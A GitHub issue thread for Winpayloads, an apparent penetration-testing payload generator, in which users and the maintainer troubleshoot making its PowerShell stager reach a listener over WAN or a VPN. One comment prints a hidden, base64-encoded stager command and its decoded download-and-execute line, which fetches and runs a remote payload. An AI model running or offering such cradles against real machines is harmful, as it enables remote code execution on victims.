### ISSUE TITLE
Stager over WAN?

### ISSUE THREAD

**Issue by ghost** [nccgroup/Winpayloads#53]
Hello!

I’ve used your script a lot and I absolutely love it but I normally use it in my internal LAN network, but I’m trying to use it over WAN. I know the meterpreter session can run over WAN but I’d like to use the stager over WAN to. 

But I can’t figure it out... is there any possibility you could help me?

Thank you for your response and script!
Regards, Djitn

**Comment by Charliedean** [comment]
Hi,
I have added basic functionality for this.
When generating a stager, select the menu option "m" for custom IP addresses.

https://github.com/nccgroup/Winpayloads/commit/e49d8bf4a531ff46f0ab208ba113f94c50b92635

Thanks

**Comment by ghost** [comment]
Thanks for adding this functionality, I really appreciate your hard work!

**Comment by sankalpsingha** [comment]
This is a very nice tool however, I am using internal VPN which is using my tun0 interface. But everytime I type Stager and also select the "m" option, the base encrypted string is using my eth0 interface ip address.

**Comment by ghost** [comment]
I have the same problem. The thing is the webserver with the p.ps1 payload runs on the tun0 interface, when I try to decrypt the base64 string (replace the tun0 IP with the external IP) and re-ecrypt it it doesn't work anymore.

I'm trying to solve this but is it possible to let the webserver run on one custom specified port and not a random port?

Kind regards Djitn

**Comment by Charliedean** [comment]
Will look into this.
Thanks

**Comment by Charliedean** [comment]
Just added something small that could potentially work. Please let me know.
https://github.com/nccgroup/Winpayloads/commit/88856c2d7bcdfdd508b04bac37418bb8d319782b

**Comment by sankalpsingha** [comment]
I tried it. It is still not using the IP address that I specified in the manual IP.

**Comment by ghost** [comment]
Hello Charliedean,

I've tried it and it gives me an error:
`Main Menu > stager
[?] (b)ind/[r]everse/(m)anual: m

[?] IP Addr: **.**.***.*** [WAN]

powershell -w hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUALgAyADoANwAyADcAOAAvAHAALgBwAHMAMQAnACkA
Traceback (most recent call last):
  File "WinPayloads.py", line 45, in <module>
    getAndRunMainMenu()
  File "/root/Bureaublad/tools/Winpayloads/lib/menu.py", line 46, in getAndRunMainMenu
    mainMenu.runmenu()
  File "/root/Bureaublad/tools/Winpayloads/lib/menu.py", line 111, in runmenu
    result = extrawork()
  File "/root/Bureaublad/tools/Winpayloads/lib/stager.py", line 47, in printListener
    listenerserver = Server(manualIP, 5555, bindsocket=True)
  File "/root/Bureaublad/tools/Winpayloads/lib/listener.py", line 72, in __init__
    self.bind((host, port))
  File "/usr/lib/python2.7/asyncore.py", line 342, in bind
    return self.socket.bind(addr)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 99] Kan verzochte adres niet toewijzen (aka. Can not assign requested address)`


Also I decoded the stager code and it shows me this: `IEX (New-Object Net.Webclient).DownloadString('http://192.168.5.2:7278/p.ps1')` this is the IP of the tun0 interface and not the specified address in the manual option above.

**Comment by Charliedean** [comment]
So i think i've fixed the issue with the encoded powershell still using the default ip addr.  
https://github.com/nccgroup/Winpayloads/commit/4f1a7e04bca3dfb76327d2b91d7743b11e32f984

@djitn That error looks to be because sockets cannot access the specified manual IP. (Non existent address requested)

**Comment by ghost** [comment]
The issue is fixed! Thanks!!

But my second issue isn't. I'm still getting the error.. Is that because my device can't access the external address? (The external address is a static WAN address of a vpn host, the client needs to connect to that address what will be send through the tunnel to my device.)
